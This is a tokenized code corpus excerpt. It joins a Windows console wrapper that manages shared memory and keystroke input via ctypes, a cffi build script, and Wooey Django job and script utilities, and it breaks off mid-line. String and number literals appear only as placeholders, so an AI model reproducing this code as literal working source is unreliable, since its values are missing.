pid = pi . dwProcessId <EOL> self . handle = pi . hProcess <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> time . sleep ( <NUM_LIT> ) <EOL> try : <EOL> res = ctypes . windll . kernel32 . AttachConsole ( self . pid ) <EOL> break <EOL> except : <EOL> pass <EOL> self . stdout = ctypes . windll . kernel32 . GetStdHandle ( STD_OUTPUT_HANDLE ) <EOL> self . stdin = ctypes . windll . kernel32 . GetStdHandle ( STD_INPUT_HANDLE ) <EOL> size = COORD ( self . buffer_width , self . buffer_height ) <EOL> res = ctypes . windll . kernel32 . SetConsoleScreenBufferSize ( self . stdout , size ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . set_window_size ( self . window_width , self . window_height ) <EOL> if '<STR_LIT>' in options and options [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> if ctypes . windll . kernel32 . IsValidCodePage ( ctypes . c_uint ( options [ '<STR_LIT>' ] ) ) : <EOL> ctypes . windll . kernel32 . SetConsoleCP ( ctypes . c_uint ( options [ '<STR_LIT>' ] ) ) <EOL> ctypes . windll . kernel32 . SetConsoleOutputCP ( ctypes . c_uint ( options [ '<STR_LIT>' ] ) ) <EOL> self . init_shared_memory ( mem_key ) <EOL> self . tc = ctypes . create_unicode_buffer ( self . buffer_width ) <EOL> self . ac = ctypes . create_unicode_buffer ( self . buffer_width ) <EOL> return True <EOL> except : <EOL> return False <EOL> def init_shared_memory ( self , mem_key ) : <EOL> """<STR_LIT>""" <EOL> self . shm_input = ConqueSoleSharedMemory ( CONQUE_SOLE_INPUT_SIZE , '<STR_LIT:input>' , mem_key ) <EOL> self . shm_input . create ( '<STR_LIT>' ) <EOL> self . shm_input . clear ( ) <EOL> self . shm_output = ConqueSoleSharedMemory ( self . buffer_height * self . buffer_width , '<STR_LIT>' , mem_key , True ) <EOL> self . shm_output . create ( '<STR_LIT>' ) <EOL> self . shm_output . clear ( ) <EOL> if not self . fast_mode : <EOL> buf_info = self . get_buffer_info ( ) <EOL> self . shm_attributes = ConqueSoleSharedMemory ( self . buffer_height * self . 
buffer_width , '<STR_LIT>' , mem_key , True , chr ( buf_info . wAttributes ) , encoding = '<STR_LIT>' ) <EOL> self . shm_attributes . create ( '<STR_LIT>' ) <EOL> self . shm_attributes . clear ( ) <EOL> self . shm_stats = ConqueSoleSharedMemory ( CONQUE_SOLE_STATS_SIZE , '<STR_LIT>' , mem_key , serialize = True ) <EOL> self . shm_stats . create ( '<STR_LIT>' ) <EOL> self . shm_stats . clear ( ) <EOL> self . shm_command = ConqueSoleSharedMemory ( CONQUE_SOLE_COMMANDS_SIZE , '<STR_LIT>' , mem_key , serialize = True ) <EOL> self . shm_command . create ( '<STR_LIT>' ) <EOL> self . shm_command . clear ( ) <EOL> self . shm_resize = ConqueSoleSharedMemory ( CONQUE_SOLE_RESIZE_SIZE , '<STR_LIT>' , mem_key , serialize = True ) <EOL> self . shm_resize . create ( '<STR_LIT>' ) <EOL> self . shm_resize . clear ( ) <EOL> self . shm_rescroll = ConqueSoleSharedMemory ( CONQUE_SOLE_RESCROLL_SIZE , '<STR_LIT>' , mem_key , serialize = True ) <EOL> self . shm_rescroll . create ( '<STR_LIT>' ) <EOL> self . shm_rescroll . clear ( ) <EOL> return True <EOL> def check_commands ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = self . shm_command . read ( ) <EOL> if cmd : <EOL> if cmd [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . shm_command . clear ( ) <EOL> self . close ( ) <EOL> return <EOL> cmd = self . shm_resize . read ( ) <EOL> if cmd : <EOL> self . shm_resize . clear ( ) <EOL> if cmd [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> if cmd [ '<STR_LIT:data>' ] [ '<STR_LIT:width>' ] > self . buffer_width : <EOL> self . buffer_width = cmd [ '<STR_LIT:data>' ] [ '<STR_LIT:width>' ] <EOL> self . window_width = cmd [ '<STR_LIT:data>' ] [ '<STR_LIT:width>' ] <EOL> self . window_height = cmd [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> buf_info = self . get_buffer_info ( ) <EOL> self . reset_console ( buf_info , add_block = False ) <EOL> def read ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . screen_redraw_ct == <NUM_LIT:0> and not self . 
is_alive ( ) : <EOL> stats = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : self . cursor_line , '<STR_LIT>' : <NUM_LIT:0> } <EOL> self . shm_stats . write ( stats ) <EOL> return <EOL> self . check_commands ( ) <EOL> buf_info = self . get_buffer_info ( ) <EOL> curs_line = buf_info . dwCursorPosition . Y <EOL> curs_col = buf_info . dwCursorPosition . X <EOL> if curs_line != self . cursor_line or self . top != buf_info . srWindow . Top or self . screen_redraw_ct == CONQUE_SOLE_SCREEN_REDRAW : <EOL> self . screen_redraw_ct = <NUM_LIT:0> <EOL> read_start = self . top <EOL> read_end = max ( [ buf_info . srWindow . Bottom + <NUM_LIT:1> , curs_line + <NUM_LIT:1> ] ) <EOL> else : <EOL> read_start = curs_line <EOL> read_end = curs_line + <NUM_LIT:1> <EOL> coord = COORD ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> chars_read = ctypes . c_int ( <NUM_LIT:0> ) <EOL> for i in range ( read_start , read_end ) : <EOL> coord . Y = i <EOL> res = ctypes . windll . kernel32 . ReadConsoleOutputCharacterW ( self . stdout , ctypes . byref ( self . tc ) , self . buffer_width , coord , ctypes . byref ( chars_read ) ) <EOL> if not self . fast_mode : <EOL> ctypes . windll . kernel32 . ReadConsoleOutputAttribute ( self . stdout , ctypes . byref ( self . ac ) , self . buffer_width , coord , ctypes . byref ( chars_read ) ) <EOL> t = self . tc . value <EOL> if not self . fast_mode : <EOL> a = self . ac . value <EOL> if i >= len ( self . data ) : <EOL> for j in range ( len ( self . data ) , i + <NUM_LIT:1> ) : <EOL> self . data . append ( '<STR_LIT>' ) <EOL> if not self . fast_mode : <EOL> self . attributes . append ( '<STR_LIT>' ) <EOL> self . data [ i ] = t <EOL> if not self . fast_mode : <EOL> self . attributes [ i ] = a <EOL> try : <EOL> if self . mem_redraw_ct == CONQUE_SOLE_MEM_REDRAW : <EOL> self . mem_redraw_ct = <NUM_LIT:0> <EOL> for i in range ( <NUM_LIT:0> , len ( self . data ) ) : <EOL> self . shm_output . write ( text = self . 
data [ i ] , start = self . buffer_width * i ) <EOL> if not self . fast_mode : <EOL> self . shm_attributes . write ( text = self . attributes [ i ] , start = self . buffer_width * i ) <EOL> else : <EOL> for i in range ( read_start , read_end ) : <EOL> self . shm_output . write ( text = self . data [ i ] , start = self . buffer_width * i ) <EOL> if not self . fast_mode : <EOL> self . shm_attributes . write ( text = self . attributes [ i ] , start = self . buffer_width * i ) <EOL> stats = { '<STR_LIT>' : buf_info . srWindow . Top , '<STR_LIT>' : buf_info . wAttributes , '<STR_LIT>' : curs_col , '<STR_LIT>' : curs_line , '<STR_LIT>' : <NUM_LIT:1> } <EOL> self . shm_stats . write ( stats ) <EOL> self . top = buf_info . srWindow . Top <EOL> self . cursor_line = curs_line <EOL> if curs_line > buf_info . dwSize . Y - <NUM_LIT:200> : <EOL> self . reset_console ( buf_info ) <EOL> except : <EOL> pass <EOL> self . screen_redraw_ct += <NUM_LIT:1> <EOL> self . mem_redraw_ct += <NUM_LIT:1> <EOL> return None <EOL> def reset_console ( self , buf_info , add_block = True ) : <EOL> """<STR_LIT>""" <EOL> if add_block : <EOL> self . output_blocks += <NUM_LIT:1> <EOL> self . shm_output . close ( ) <EOL> self . shm_output = None <EOL> if not self . fast_mode : <EOL> self . shm_attributes . close ( ) <EOL> self . shm_attributes = None <EOL> mem_key = '<STR_LIT>' + str ( time . time ( ) ) <EOL> self . shm_output = ConqueSoleSharedMemory ( self . buffer_height * self . buffer_width * self . output_blocks , '<STR_LIT>' , mem_key , True ) <EOL> self . shm_output . create ( '<STR_LIT>' ) <EOL> self . shm_output . clear ( ) <EOL> if len ( self . data [ <NUM_LIT:0> ] ) < self . buffer_width : <EOL> for i in range ( <NUM_LIT:0> , len ( self . data ) ) : <EOL> self . data [ i ] = self . data [ i ] + '<STR_LIT:U+0020>' * ( self . buffer_width - len ( self . data [ i ] ) ) <EOL> self . shm_output . write ( '<STR_LIT>' . join ( self . data ) ) <EOL> if not self . fast_mode : <EOL> self . 
shm_attributes = ConqueSoleSharedMemory ( self . buffer_height * self . buffer_width * self . output_blocks , '<STR_LIT>' , mem_key , True , chr ( buf_info . wAttributes ) , encoding = '<STR_LIT>' ) <EOL> self . shm_attributes . create ( '<STR_LIT>' ) <EOL> self . shm_attributes . clear ( ) <EOL> if len ( self . attributes [ <NUM_LIT:0> ] ) < self . buffer_width : <EOL> for i in range ( <NUM_LIT:0> , len ( self . attributes ) ) : <EOL> self . attributes [ i ] = self . attributes [ i ] + chr ( buf_info . wAttributes ) * ( self . buffer_width - len ( self . attributes [ i ] ) ) <EOL> if not self . fast_mode : <EOL> self . shm_attributes . write ( '<STR_LIT>' . join ( self . attributes ) ) <EOL> self . shm_rescroll . write ( { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:data>' : { '<STR_LIT>' : self . output_blocks , '<STR_LIT>' : mem_key } } ) <EOL> size = COORD ( X = self . buffer_width , Y = self . buffer_height * self . output_blocks ) <EOL> res = ctypes . windll . kernel32 . SetConsoleScreenBufferSize ( self . stdout , size ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . set_window_size ( self . window_width , self . window_height ) <EOL> self . tc = ctypes . create_unicode_buffer ( self . buffer_width ) <EOL> self . ac = ctypes . create_unicode_buffer ( self . buffer_width ) <EOL> def write ( self ) : <EOL> """<STR_LIT>""" <EOL> text = self . shm_input . read ( ) <EOL> if text == u ( '<STR_LIT>' ) : <EOL> return <EOL> self . shm_input . clear ( ) <EOL> chunks = CONQUE_WIN32_REGEX_VK . split ( text ) <EOL> if len ( chunks ) == <NUM_LIT:1> : <EOL> self . write_plain ( text ) <EOL> return <EOL> for t in chunks : <EOL> if t == '<STR_LIT>' : <EOL> continue <EOL> if CONQUE_WIN32_REGEX_VK . match ( t ) : <EOL> self . write_vk ( t [ <NUM_LIT:2> : - <NUM_LIT:2> ] ) <EOL> else : <EOL> self . 
write_plain ( t ) <EOL> def write_plain ( self , text ) : <EOL> """<STR_LIT>""" <EOL> li = INPUT_RECORD * len ( text ) <EOL> list_input = li ( ) <EOL> for i in range ( <NUM_LIT:0> , len ( text ) ) : <EOL> ke = KEY_EVENT_RECORD ( ) <EOL> ke . bKeyDown = ctypes . c_byte ( <NUM_LIT:1> ) <EOL> ke . wRepeatCount = ctypes . c_short ( <NUM_LIT:1> ) <EOL> cnum = ord ( text [ i ] ) <EOL> ke . wVirtualKeyCode = ctypes . windll . user32 . VkKeyScanW ( cnum ) <EOL> ke . wVirtualScanCode = ctypes . c_short ( ctypes . windll . user32 . MapVirtualKeyW ( int ( cnum ) , <NUM_LIT:0> ) ) <EOL> if cnum > <NUM_LIT> : <EOL> ke . uChar . UnicodeChar = uchr ( cnum ) <EOL> elif cnum == <NUM_LIT:3> : <EOL> ctypes . windll . kernel32 . GenerateConsoleCtrlEvent ( <NUM_LIT:0> , self . pid ) <EOL> ke . uChar . UnicodeChar = uchr ( cnum ) <EOL> ke . wVirtualKeyCode = ctypes . windll . user32 . VkKeyScanW ( cnum + <NUM_LIT> ) <EOL> ke . dwControlKeyState |= LEFT_CTRL_PRESSED <EOL> else : <EOL> ke . uChar . UnicodeChar = uchr ( cnum ) <EOL> if cnum in CONQUE_WINDOWS_VK_INV : <EOL> ke . wVirtualKeyCode = cnum <EOL> else : <EOL> ke . wVirtualKeyCode = ctypes . windll . user32 . VkKeyScanW ( cnum + <NUM_LIT> ) <EOL> ke . dwControlKeyState |= LEFT_CTRL_PRESSED <EOL> kc = INPUT_RECORD ( KEY_EVENT ) <EOL> kc . Event . KeyEvent = ke <EOL> list_input [ i ] = kc <EOL> events_written = ctypes . c_int ( ) <EOL> res = ctypes . windll . kernel32 . WriteConsoleInputW ( self . stdin , list_input , len ( text ) , ctypes . byref ( events_written ) ) <EOL> def write_vk ( self , vk_code ) : <EOL> """<STR_LIT>""" <EOL> code = None <EOL> ctrl_pressed = False <EOL> vk_attributes = vk_code . split ( '<STR_LIT:;>' ) <EOL> for attr in vk_attributes : <EOL> if attr == CONQUE_VK_ATTR_CTRL_PRESSED : <EOL> ctrl_pressed = True <EOL> else : <EOL> code = attr <EOL> li = INPUT_RECORD * <NUM_LIT:1> <EOL> ke = KEY_EVENT_RECORD ( ) <EOL> ke . uChar . UnicodeChar = uchr ( <NUM_LIT:0> ) <EOL> ke . wVirtualKeyCode = ctypes . 
c_short ( int ( code ) ) <EOL> ke . wVirtualScanCode = ctypes . c_short ( ctypes . windll . user32 . MapVirtualKeyW ( int ( code ) , <NUM_LIT:0> ) ) <EOL> ke . bKeyDown = ctypes . c_byte ( <NUM_LIT:1> ) <EOL> ke . wRepeatCount = ctypes . c_short ( <NUM_LIT:1> ) <EOL> if code in CONQUE_WINDOWS_VK_ENHANCED : <EOL> ke . dwControlKeyState |= ENHANCED_KEY <EOL> if ctrl_pressed : <EOL> ke . dwControlKeyState |= LEFT_CTRL_PRESSED <EOL> kc = INPUT_RECORD ( KEY_EVENT ) <EOL> kc . Event . KeyEvent = ke <EOL> list_input = li ( kc ) <EOL> events_written = ctypes . c_int ( ) <EOL> res = ctypes . windll . kernel32 . WriteConsoleInputW ( self . stdin , list_input , <NUM_LIT:1> , ctypes . byref ( events_written ) ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> self . is_alive = False <EOL> try : <EOL> stats = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : self . cursor_line , '<STR_LIT>' : <NUM_LIT:0> } <EOL> self . shm_stats . write ( stats ) <EOL> except : <EOL> pass <EOL> pid_list = ( ctypes . c_int * <NUM_LIT:10> ) ( ) <EOL> num = ctypes . windll . kernel32 . GetConsoleProcessList ( pid_list , <NUM_LIT:10> ) <EOL> current_pid = os . getpid ( ) <EOL> for pid in pid_list [ <NUM_LIT:0> : num ] : <EOL> if not pid : <EOL> break <EOL> if pid == current_pid : <EOL> continue <EOL> try : <EOL> self . close_pid ( pid ) <EOL> except : <EOL> pass <EOL> try : <EOL> self . close_pid ( current_pid ) <EOL> except : <EOL> pass <EOL> def close_pid ( self , pid ) : <EOL> """<STR_LIT>""" <EOL> handle = ctypes . windll . kernel32 . OpenProcess ( PROCESS_TERMINATE , <NUM_LIT:0> , pid ) <EOL> ctypes . windll . kernel32 . TerminateProcess ( handle , - <NUM_LIT:1> ) <EOL> ctypes . windll . kernel32 . CloseHandle ( handle ) <EOL> def is_alive ( self ) : <EOL> """<STR_LIT>""" <EOL> status = ctypes . windll . kernel32 . WaitForSingleObject ( self . handle , <NUM_LIT:1> ) <EOL> if status == <NUM_LIT:0> : <EOL> self . 
is_alive = False <EOL> return self . is_alive <EOL> def get_screen_text ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT:\n>" . join ( self . data ) <EOL> def set_window_size ( self , width , height ) : <EOL> """<STR_LIT>""" <EOL> window_size = SMALL_RECT ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> buf_info = self . get_buffer_info ( ) <EOL> window_size . Top = <NUM_LIT:0> <EOL> window_size . Left = <NUM_LIT:0> <EOL> if buf_info . dwMaximumWindowSize . X < width : <EOL> window_size . Right = buf_info . dwMaximumWindowSize . X - <NUM_LIT:1> <EOL> else : <EOL> window_size . Right = width - <NUM_LIT:1> <EOL> if buf_info . dwMaximumWindowSize . Y < height : <EOL> window_size . Bottom = buf_info . dwMaximumWindowSize . Y - <NUM_LIT:1> <EOL> else : <EOL> window_size . Bottom = height - <NUM_LIT:1> <EOL> res = ctypes . windll . kernel32 . SetConsoleWindowInfo ( self . stdout , ctypes . c_bool ( True ) , ctypes . byref ( window_size ) ) <EOL> buf_info = self . get_buffer_info ( ) <EOL> self . window_width = buf_info . srWindow . Right + <NUM_LIT:1> <EOL> self . window_height = buf_info . srWindow . Bottom + <NUM_LIT:1> <EOL> def get_buffer_info ( self ) : <EOL> """<STR_LIT>""" <EOL> buf_info = CONSOLE_SCREEN_BUFFER_INFO ( ) <EOL> ctypes . windll . kernel32 . GetConsoleScreenBufferInfo ( self . stdout , ctypes . byref ( buf_info ) ) <EOL> return buf_info </s>
<s> import os <EOL> from cffi import FFI <EOL> ffi = FFI ( ) <EOL> ffi . set_source ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> libraries = [ "<STR_LIT:c>" ] , <EOL> ) <EOL> with open ( os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) ) as f : <EOL> ffi . cdef ( f . read ( ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> ffi . compile ( ) </s>
<s> from __future__ import absolute_import <EOL> __author__ = '<STR_LIT>' <EOL> import json <EOL> import errno <EOL> import os <EOL> import re <EOL> import sys <EOL> import six <EOL> import uuid <EOL> import traceback <EOL> from operator import itemgetter <EOL> from collections import OrderedDict , defaultdict <EOL> from pkg_resources import parse_version <EOL> from django . conf import settings <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . db import transaction <EOL> from django . db . utils import OperationalError <EOL> from django . core . files . storage import default_storage <EOL> from django . core . files import File <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . db . models import Q <EOL> from celery . contrib import rdb <EOL> from io import open <EOL> from clinto . parser import Parser <EOL> from . . import settings as wooey_settings <EOL> def sanitize_name ( name ) : <EOL> return name . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> def sanitize_string ( value ) : <EOL> return value . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> def get_storage ( local = True ) : <EOL> if wooey_settings . WOOEY_EPHEMERAL_FILES : <EOL> storage = default_storage . local_storage if local else default_storage <EOL> else : <EOL> storage = default_storage <EOL> return storage <EOL> def purge_output ( job = None ) : <EOL> from . . models import UserFile <EOL> local_storage = get_storage ( local = True ) <EOL> for user_file in UserFile . objects . filter ( job = job ) : <EOL> if user_file . parameter is None or user_file . parameter . parameter . is_output : <EOL> system_file = user_file . system_file <EOL> matching_files = UserFile . objects . filter ( system_file = system_file ) . exclude ( job = user_file . job ) <EOL> if matching_files . count ( ) == <NUM_LIT:0> : <EOL> wooey_file = system_file . filepath . name <EOL> system_file . filepath . 
delete ( False ) <EOL> system_file . delete ( ) <EOL> path = local_storage . path ( wooey_file ) <EOL> if local_storage . exists ( path ) : <EOL> local_storage . delete ( path ) <EOL> user_file . delete ( ) <EOL> def get_job_commands ( job = None ) : <EOL> script_version = job . script_version <EOL> com = [ sys . executable ] if sys . executable else [ ] <EOL> com . extend ( [ script_version . get_script_path ( ) ] ) <EOL> parameters = job . get_parameters ( ) <EOL> param_dict = OrderedDict ( ) <EOL> for param in parameters : <EOL> subproc_dict = param . get_subprocess_value ( ) <EOL> if subproc_dict is None : <EOL> continue <EOL> subproc_param = subproc_dict [ '<STR_LIT>' ] <EOL> if subproc_param not in param_dict : <EOL> param_dict [ subproc_param ] = [ ] <EOL> subproc_value = subproc_dict . get ( '<STR_LIT:value>' , None ) <EOL> if subproc_value : <EOL> param_dict [ subproc_param ] . append ( subproc_value ) <EOL> for param , values in param_dict . items ( ) : <EOL> if param and not values : <EOL> com . append ( param ) <EOL> else : <EOL> for value in values : <EOL> if param : <EOL> com . append ( param ) <EOL> com . append ( value ) <EOL> return com <EOL> @ transaction . atomic <EOL> def create_wooey_job ( user = None , script_version_pk = None , data = None ) : <EOL> from . . models import Script , WooeyJob , ScriptParameter , ScriptParameters , ScriptVersion <EOL> script_version = ScriptVersion . objects . select_related ( '<STR_LIT>' ) . get ( pk = script_version_pk ) <EOL> if data is None : <EOL> data = { } <EOL> job = WooeyJob ( user = user , job_name = data . pop ( '<STR_LIT>' , None ) , job_description = data . pop ( '<STR_LIT>' , None ) , <EOL> script_version = script_version ) <EOL> job . save ( ) <EOL> parameters = OrderedDict ( [ ( i . slug , i ) for i in ScriptParameter . objects . filter ( slug__in = data . keys ( ) ) . order_by ( '<STR_LIT>' ) ] ) <EOL> for slug , param in six . iteritems ( parameters ) : <EOL> slug_values = data . 
get ( slug ) <EOL> slug_values = slug_values if isinstance ( slug_values , list ) else [ slug_values ] <EOL> for slug_value in slug_values : <EOL> new_param = ScriptParameters ( job = job , parameter = param ) <EOL> new_param . value = slug_value <EOL> new_param . save ( ) <EOL> return job <EOL> def get_master_form ( script_version = None , pk = None ) : <EOL> from . . forms . factory import DJ_FORM_FACTORY <EOL> return DJ_FORM_FACTORY . get_master_form ( script_version = script_version , pk = pk ) <EOL> def get_form_groups ( script_version = None , pk = None , initial_dict = None , render_fn = None ) : <EOL> from . . forms . factory import DJ_FORM_FACTORY <EOL> return DJ_FORM_FACTORY . get_group_forms ( script_version = script_version , pk = pk , initial_dict = initial_dict , render_fn = render_fn ) <EOL> def reset_form_factory ( script_version = None ) : <EOL> from . . forms . factory import DJ_FORM_FACTORY <EOL> DJ_FORM_FACTORY . reset_forms ( script_version = script_version ) <EOL> def validate_form ( form = None , data = None , files = None ) : <EOL> form . add_wooey_fields ( ) <EOL> form . data = data if data is not None else { } <EOL> form . files = files if files is not None else { } <EOL> form . is_bound = True <EOL> form . full_clean ( ) <EOL> def get_current_scripts ( ) : <EOL> from . . models import ScriptVersion <EOL> try : <EOL> scripts = ScriptVersion . objects . count ( ) <EOL> except OperationalError : <EOL> return <EOL> scripts = ScriptVersion . objects . select_related ( '<STR_LIT>' ) . filter ( default_version = True ) <EOL> non_default_scripts = ScriptVersion . objects . filter ( default_version = False ) . exclude ( script__in = [ i . script for i in scripts ] ) <EOL> script_versions = defaultdict ( list ) <EOL> for sv in non_default_scripts : <EOL> try : <EOL> version_string = parse_version ( str ( sv . script_version ) ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . 
format_exc ( ) ) ) <EOL> version_string = sv . script_version <EOL> script_versions [ sv . script . script_name ] . append ( ( version_string , sv . script_iteration , sv ) ) <EOL> [ script_versions [ i ] . sort ( key = itemgetter ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) , reverse = True ) for i in script_versions ] <EOL> scripts = [ i . script for i in scripts ] <EOL> if script_versions : <EOL> for script_version_info in script_versions . values ( ) : <EOL> new_scripts = ScriptVersion . objects . select_related ( '<STR_LIT>' ) . filter ( pk__in = [ i [ <NUM_LIT:2> ] . pk for i in script_version_info ] ) <EOL> scripts . extend ( [ i . script for i in new_scripts ] ) <EOL> return scripts <EOL> def get_storage_object ( path , local = False ) : <EOL> storage = get_storage ( local = local ) <EOL> obj = storage . open ( path ) <EOL> obj . url = storage . url ( path ) <EOL> obj . path = storage . path ( path ) <EOL> return obj <EOL> def add_wooey_script ( script_version = None , script_path = None , group = None ) : <EOL> from . . models import Script , ScriptGroup , ScriptParameter , ScriptParameterGroup , ScriptVersion <EOL> local_storage = get_storage ( local = True ) <EOL> if script_version is not None : <EOL> old_name = script_version . script_path . name <EOL> new_name = os . path . normpath ( os . path . join ( wooey_settings . WOOEY_SCRIPT_DIR , old_name ) if not old_name . startswith ( wooey_settings . WOOEY_SCRIPT_DIR ) else old_name ) <EOL> current_storage = get_storage ( local = not wooey_settings . WOOEY_EPHEMERAL_FILES ) <EOL> current_file = current_storage . open ( old_name ) <EOL> if current_storage . exists ( new_name ) : <EOL> new_name = current_storage . get_available_name ( new_name ) <EOL> new_path = current_storage . save ( new_name , current_file ) <EOL> if old_name != new_name : <EOL> current_file . close ( ) <EOL> current_storage . delete ( old_name ) <EOL> current_file = current_storage . open ( new_path ) <EOL> script_version . 
_rename_script = True <EOL> script_version . script_path . name = new_name <EOL> script_version . save ( ) <EOL> if not local_storage . exists ( new_path ) : <EOL> new_path = local_storage . save ( new_path , current_file ) <EOL> script = get_storage_object ( new_path , local = True ) . path <EOL> local_file = local_storage . open ( new_path ) . name <EOL> else : <EOL> if wooey_settings . WOOEY_EPHEMERAL_FILES : <EOL> remote_storage = get_storage ( local = False ) <EOL> remote_file = remote_storage . open ( script_path ) <EOL> local_file = local_storage . save ( script_path , remote_file ) <EOL> else : <EOL> local_file = local_storage . open ( script_path ) . name <EOL> script = get_storage_object ( local_file , local = True ) . path <EOL> if isinstance ( group , ScriptGroup ) : <EOL> group = group . group_name <EOL> if group is None : <EOL> group = '<STR_LIT>' <EOL> basename , extension = os . path . splitext ( script ) <EOL> filename = os . path . split ( basename ) [ <NUM_LIT:1> ] <EOL> parser = Parser ( script_name = filename , script_path = local_storage . path ( local_file ) ) <EOL> if not parser . valid : <EOL> return { '<STR_LIT>' : False , '<STR_LIT>' : parser . error } <EOL> d = parser . get_script_description ( ) <EOL> script_group , created = ScriptGroup . objects . get_or_create ( group_name = group ) <EOL> version_string = d . get ( '<STR_LIT:version>' ) <EOL> if version_string is None : <EOL> version_string = '<STR_LIT:1>' <EOL> try : <EOL> parse_version ( version_string ) <EOL> except : <EOL> sys . stderr . write ( '<STR_LIT>' . format ( traceback . format_exc ( ) ) ) <EOL> version_string = '<STR_LIT:1>' <EOL> if script_version is None : <EOL> script_kwargs = { '<STR_LIT>' : script_group , '<STR_LIT>' : d [ '<STR_LIT:name>' ] } <EOL> version_kwargs = { '<STR_LIT>' : version_string , '<STR_LIT>' : local_file , '<STR_LIT>' : True } <EOL> script_created = Script . objects . filter ( ** script_kwargs ) . 
count ( ) == <NUM_LIT:0> <EOL> if script_created : <EOL> script_kwargs . update ( { '<STR_LIT>' : d [ '<STR_LIT:description>' ] } ) <EOL> wooey_script = Script ( ** script_kwargs ) <EOL> wooey_script . _script_cl_creation = True <EOL> wooey_script . save ( ) <EOL> version_kwargs . update ( { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> else : <EOL> wooey_script = Script . objects . get ( ** script_kwargs ) <EOL> if not wooey_script . script_description and d [ '<STR_LIT:description>' ] : <EOL> wooey_script . script_description = d [ '<STR_LIT:description>' ] <EOL> wooey_script . save ( ) <EOL> current_versions = ScriptVersion . objects . filter ( script = wooey_script , script_version = version_string ) <EOL> if current_versions . count ( ) == <NUM_LIT:0> : <EOL> next_iteration = <NUM_LIT:1> <EOL> ScriptVersion . objects . filter ( script = wooey_script , script_version = version_string ) . update ( default_version = False ) <EOL> else : <EOL> next_iteration = sorted ( [ i . script_iteration for i in current_versions ] ) [ - <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> version_kwargs . update ( { '<STR_LIT>' : next_iteration } ) <EOL> version_kwargs . update ( { '<STR_LIT>' : wooey_script } ) <EOL> script_version = ScriptVersion ( ** version_kwargs ) <EOL> script_version . _script_cl_creation = True <EOL> script_version . save ( ) <EOL> else : <EOL> if not script_version . script . script_description : <EOL> script_version . script . script_description = d [ '<STR_LIT:description>' ] <EOL> if not script_version . script . script_name : <EOL> script_version . script . script_name = d [ '<STR_LIT:name>' ] <EOL> past_versions = ScriptVersion . objects . filter ( script = script_version . script , script_version = version_string ) . exclude ( pk = script_version . pk ) <EOL> script_version . script_iteration = past_versions . count ( ) + <NUM_LIT:1> <EOL> past_versions . update ( default_version = False ) <EOL> script_version . default_version = True <EOL> script_version . script . 
save ( ) <EOL> script_version . save ( ) <EOL> for param_group_info in d [ '<STR_LIT>' ] : <EOL> param_group , created = ScriptParameterGroup . objects . get_or_create ( group_name = param_group_info . get ( '<STR_LIT>' ) , script_version = script_version ) <EOL> for param in param_group_info . get ( '<STR_LIT>' ) : <EOL> is_out = True if ( param . get ( '<STR_LIT>' , None ) == False and param . get ( '<STR_LIT:type>' ) == '<STR_LIT:file>' ) else not param . get ( '<STR_LIT>' , False ) <EOL> script_param , created = ScriptParameter . objects . get_or_create ( script_version = script_version , short_param = param [ '<STR_LIT>' ] , script_param = param [ '<STR_LIT:name>' ] , <EOL> is_output = is_out , required = param . get ( '<STR_LIT>' , False ) , <EOL> form_field = param [ '<STR_LIT>' ] , default = param . get ( '<STR_LIT:value>' ) , input_type = param . get ( '<STR_LIT:type>' ) , <EOL> choices = json . dumps ( param . get ( '<STR_LIT>' ) ) , choice_limit = json . dumps ( param . get ( '<STR_LIT>' , <NUM_LIT:1> ) ) , <EOL> param_help = param . get ( '<STR_LIT>' ) , is_checked = param . get ( '<STR_LIT>' , False ) , <EOL> parameter_group = param_group ) <EOL> return { '<STR_LIT>' : True , '<STR_LIT>' : None , '<STR_LIT>' : script_version } <EOL> def valid_user ( obj , user ) : <EOL> ret = { '<STR_LIT>' : False , '<STR_LIT:error>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> from . . models import Script <EOL> groups = obj . user_groups . all ( ) <EOL> if wooey_settings . WOOEY_ALLOW_ANONYMOUS or user . is_authenticated ( ) : <EOL> if isinstance ( obj , Script ) : <EOL> from itertools import chain <EOL> groups = list ( chain ( groups , obj . script_group . user_groups . all ( ) ) ) <EOL> if not user . is_authenticated ( ) and wooey_settings . WOOEY_ALLOW_ANONYMOUS and len ( groups ) == <NUM_LIT:0> : <EOL> ret [ '<STR_LIT>' ] = True <EOL> elif groups : <EOL> ret [ '<STR_LIT:error>' ] = _ ( '<STR_LIT>' ) <EOL> if not groups and obj . 
